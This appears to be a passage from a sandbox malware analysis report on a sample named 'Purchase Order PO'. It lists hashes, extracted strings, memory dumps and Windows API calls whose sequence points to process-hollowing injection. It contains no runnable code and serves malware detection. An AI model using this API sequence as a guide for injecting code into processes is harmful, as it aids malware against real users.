                                                                                                                            • Instruction Fuzzy Hash: 28725E70A042199FCB14DF69E894AAEBBF6FF88300F15856AE546EB391DB30DD41CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                            • API String ID: 0-183542557
                                                                                                                            • Opcode ID: 892473618b9bab9ee02a91ceb0c977851f471df426a54274d3f1dee2ab664b08
                                                                                                                            • Instruction ID: 5d88c04af5dbe5c78c4af69c44d05fc265316fa41bb97f6c5b57bb578a644c24
                                                                                                                            • Opcode Fuzzy Hash: 892473618b9bab9ee02a91ceb0c977851f471df426a54274d3f1dee2ab664b08
                                                                                                                            • Instruction Fuzzy Hash: 89A28170A04209DFCB15CF68C894AAEBBF6FF88304F168566E546DB365DB30E981CB51

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 0-2746444292
                                                                                                                            • Opcode ID: 17dc073e2af0779b61cbf935dc56949638cc9a11dc9ba79c6d527dc492b367af
                                                                                                                            • Instruction ID: 207199dc99491528dabf9b8bf281510b7823b073bc12f27ea17cc469481eb53f
                                                                                                                            • Opcode Fuzzy Hash: 17dc073e2af0779b61cbf935dc56949638cc9a11dc9ba79c6d527dc492b367af
                                                                                                                            • Instruction Fuzzy Hash: 4D52B674A052189FCB64DF68D998A9DBBB6FF89300F1045D9E509A73A5CF309E81CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 73b156e904ca31b4612ff8f78888b8345aa6dddeccd5855b460f94fcada99d0f
                                                                                                                            • Instruction ID: d50883ba0aeb8d63d86d9a5dea69941103567e7aeae8c0dedb99244adf4aab50
                                                                                                                            • Opcode Fuzzy Hash: 73b156e904ca31b4612ff8f78888b8345aa6dddeccd5855b460f94fcada99d0f
                                                                                                                            • Instruction Fuzzy Hash: 70E1DBB1700A058FDB29DB75D4587AEB7FAAF89700F14846ED146AB390DB35E802CB52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b0ac480c8ec6d5c33aca96c595e5ade981b1901442904e954def4b89ceb14166
                                                                                                                            • Instruction ID: dd52e79506d6e2313560ba88f05cf414d80ae3ebfb31335aef97fe1c21e5b3d8
                                                                                                                            • Opcode Fuzzy Hash: b0ac480c8ec6d5c33aca96c595e5ade981b1901442904e954def4b89ceb14166
                                                                                                                            • Instruction Fuzzy Hash: 9D51D374D01208CFCB08EFA8E5986ADBBF2FF4A305F109969E416AB754DB349945CF50

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                            • API String ID: 0-1932283790

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D456
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0114D493
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D4D0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0114D529
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D456
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0114D493
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D4D0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0114D529
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                            • API String ID: 0-1978863864

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q
                                                                                                                            • API String ID: 0-945150611

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q
                                                                                                                            • API String ID: 0-355816377

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                            • API String ID: 0-4258043069
                                                                                                                            • Opcode ID: 252653bf9374de7f6c43c734aba9a538713e1ec72f9610d1e8b292de33eb2f23
                                                                                                                            • Instruction ID: ffd2503380e679e40afe43ea6ae1002d4a6925c1799d1e4177370825a87db42a
                                                                                                                            • Opcode Fuzzy Hash: 252653bf9374de7f6c43c734aba9a538713e1ec72f9610d1e8b292de33eb2f23
                                                                                                                            • Instruction Fuzzy Hash: E2B19A303082159FCB159E28D894B7B7BE6FBC8354F16856AEA46CB391DF35C841C7A4

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,bq$,bq
                                                                                                                            • API String ID: 0-2699258169
                                                                                                                            • Opcode ID: 4675dc0820f09dc81573764bb8bb268a74f31689414d58f92f5556e580a7c3df
                                                                                                                            • Instruction ID: 083ce9ad4bfc9f62a04e8d73930999857769027cd4dd006d816e8a3f669e65af
                                                                                                                            • Opcode Fuzzy Hash: 4675dc0820f09dc81573764bb8bb268a74f31689414d58f92f5556e580a7c3df
                                                                                                                            • Instruction Fuzzy Hash: CE819334B05105DFCB14CF69E88496EB7F2FF89214F16816AD616EB365EB31E841CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746730E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: 57c348a7efeb60cd6f43cd52b02fdd3bf8fba434c7140b6a516143ce3d693c83
                                                                                                                            • Instruction ID: a7ceeadcd7a5e075b47bbe99302f072c6e840be9e176d2ff0dbf3f4350cfcfee
                                                                                                                            • Opcode Fuzzy Hash: 57c348a7efeb60cd6f43cd52b02fdd3bf8fba434c7140b6a516143ce3d693c83
                                                                                                                            • Instruction Fuzzy Hash: 39A15DB1D0021ADFDB15CF68C8457DEBBB2BF48314F1481AAE858A7340DB749985CF92
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746730E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: 9afa0c31b24379234b53e55e859b31aa7f9f8c36ad81734de558bc7067f46e32
                                                                                                                            • Instruction ID: 6f3698b5f807288185fe243bb1671a458ab3ea8ad51f7a28fa8eb9b5c35ae8ea
                                                                                                                            • Opcode Fuzzy Hash: 9afa0c31b24379234b53e55e859b31aa7f9f8c36ad81734de558bc7067f46e32
                                                                                                                            • Instruction Fuzzy Hash: 85915CB1D0021ADFDB15CF68C845BDEBBB2BF48314F1481AAE858A7340DB749985CF92
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0114B3A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 58b2064a8027e1623609aabbaee9ab0f47bce0889cea5da275ecae7fbdc38bdd
                                                                                                                            • Instruction ID: c420568c116007c36c34299800a93b26d8c2cbdab1077b59472989d4efa3eb4f
                                                                                                                            • Opcode Fuzzy Hash: 58b2064a8027e1623609aabbaee9ab0f47bce0889cea5da275ecae7fbdc38bdd
                                                                                                                            • Instruction Fuzzy Hash: ED713470A04B058FD728DF6AD540B9ABBF2FF88704F00892DD48AD7A50DB34E949CB94
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 01145F59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 28d879b330a994ef5cc7eb41aaae3ce0830abef771704ba5e5dd0c403a34e239
                                                                                                                            • Instruction ID: 75b0edc6bb03fda96366734389bc28c617f632b1f836ee8a677146796896473e
                                                                                                                            • Opcode Fuzzy Hash: 28d879b330a994ef5cc7eb41aaae3ce0830abef771704ba5e5dd0c403a34e239
                                                                                                                            • Instruction Fuzzy Hash: F64102B0C00719CFDB24CFA9C9447CEBBB6BF48704F24806AD409AB255DB755945CF91
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 01145F59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: c9c9591eb37ae70b9db478b24de649c9afe16ba2f734a8f5730c49c6e2229c99
                                                                                                                            • Instruction ID: 750d3c79a02df982d871e24c52395b19dcd7bae25a83116ad2a7ebb892a8deff
                                                                                                                            • Opcode Fuzzy Hash: c9c9591eb37ae70b9db478b24de649c9afe16ba2f734a8f5730c49c6e2229c99
                                                                                                                            • Instruction Fuzzy Hash: 2641F2B0C00719CBDB28CFA9C94478EFBB6BF48704F2480AAD419AB255DB756945CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 0-2766056989
                                                                                                                            • Opcode ID: 569c8fc11b16bea9fd39aa308adfe74604077758bcf6bea825426b422183f2d0
                                                                                                                            • Instruction ID: 7e5dc87896c39b151b599bd886bdf09ef1047eda75a5ef3e78e9e68e6f093c4b
                                                                                                                            • Opcode Fuzzy Hash: 569c8fc11b16bea9fd39aa308adfe74604077758bcf6bea825426b422183f2d0
                                                                                                                            • Instruction Fuzzy Hash: D4F1C174E042188FDB50DFA9C981A9DBBF2FB49314F1491AAD919EB345EB309A81CF50
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466D36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: 3abac6c3999db346b7ca26244e7910749afeb8d4107a322c57f8c2d97440de6f
                                                                                                                            • Instruction ID: 6281cbe57834a6cdd55964abe6cfe057d14e740e894ca4a2de1d7ebe9596cf17
                                                                                                                            • Opcode Fuzzy Hash: 3abac6c3999db346b7ca26244e7910749afeb8d4107a322c57f8c2d97440de6f
                                                                                                                            • Instruction Fuzzy Hash: 48219AB19003099FCB20CFA9C4447EEBFF0EF49350F15842AD599A7240C7789945CFA2
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466EE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: 88b1e6fab669e655a8aef0315f0ed282398f5e9b9bdc1ffafd1645742e027dc3
                                                                                                                            • Instruction ID: 5e18b83ab27b8f109482093ef7b4af8c31da6cb99abbe81c61c6bd0117abc5d0
                                                                                                                            • Opcode Fuzzy Hash: 88b1e6fab669e655a8aef0315f0ed282398f5e9b9bdc1ffafd1645742e027dc3
                                                                                                                            • Instruction Fuzzy Hash: CF2157B59003599FDB10CFA9C885BDEBBF5FF48310F10842AE958A7240C7799954CFA5
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466EE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            APIs
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07466FC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726664587-0
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0114D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            APIs
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07466FC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726664587-0
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466D36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0114D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07466DFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07466DFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0114B3A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 074693DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 074693DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LR^q
                                                                                                                            • API String ID: 0-2625958711
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: 1178af6b583214e7e3b91a6330d7ae0b5316d8b5ffd82a01501d37e896dad83f
                                                                                                                            • Instruction ID: ce45a0a377e00c206b233d61b0d773f6477774d7053c81baeea85d6091eda1c5
                                                                                                                            • Opcode Fuzzy Hash: 1178af6b583214e7e3b91a6330d7ae0b5316d8b5ffd82a01501d37e896dad83f
                                                                                                                            • Instruction Fuzzy Hash: D351B131B002058FCB14EF79D8889AEBBF7FFC4224B25896AE555DB351EE309D0587A0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8bq
                                                                                                                            • API String ID: 0-187764589
                                                                                                                            • Opcode ID: 0268ab2e62219eba5bb5b0412a827255206b038d65a94c7e1886d6fd177bdbe6
                                                                                                                            • Instruction ID: 0e60004b5c79607a22851f70aa8039cb77dc6b6592275fd192d01f53db1e1e54
                                                                                                                            • Opcode Fuzzy Hash: 0268ab2e62219eba5bb5b0412a827255206b038d65a94c7e1886d6fd177bdbe6
                                                                                                                            • Instruction Fuzzy Hash: A941F774E151089FCB04DFA9E9859EEBBB2FB89304F10842AE919A7354DB319D52CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8bq
                                                                                                                            • API String ID: 0-187764589
                                                                                                                            • Opcode ID: 2b3a6a6e049d95fb1162774cbc26876077f5234550f0041d761d034c023f911b
                                                                                                                            • Instruction ID: c2fdc7b7bebaa518211363365671593804d5eb9ecf4f722dade403cfd514a1f4
                                                                                                                            • Opcode Fuzzy Hash: 2b3a6a6e049d95fb1162774cbc26876077f5234550f0041d761d034c023f911b
                                                                                                                            • Instruction Fuzzy Hash: 65412974E04108AFCB04DFA9D895AAEBBB2FF89304F14842AE919E7350DB319D52CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: adf9c85a44000ccf9aa17a575c4fd80662c9d2d62d88a9db80d2443777bd32f3
                                                                                                                            • Instruction ID: e30cab2177a4a78e8871ad1f6dd6f29bb6353b3c9e67f999f4a6ae2b6eaab903
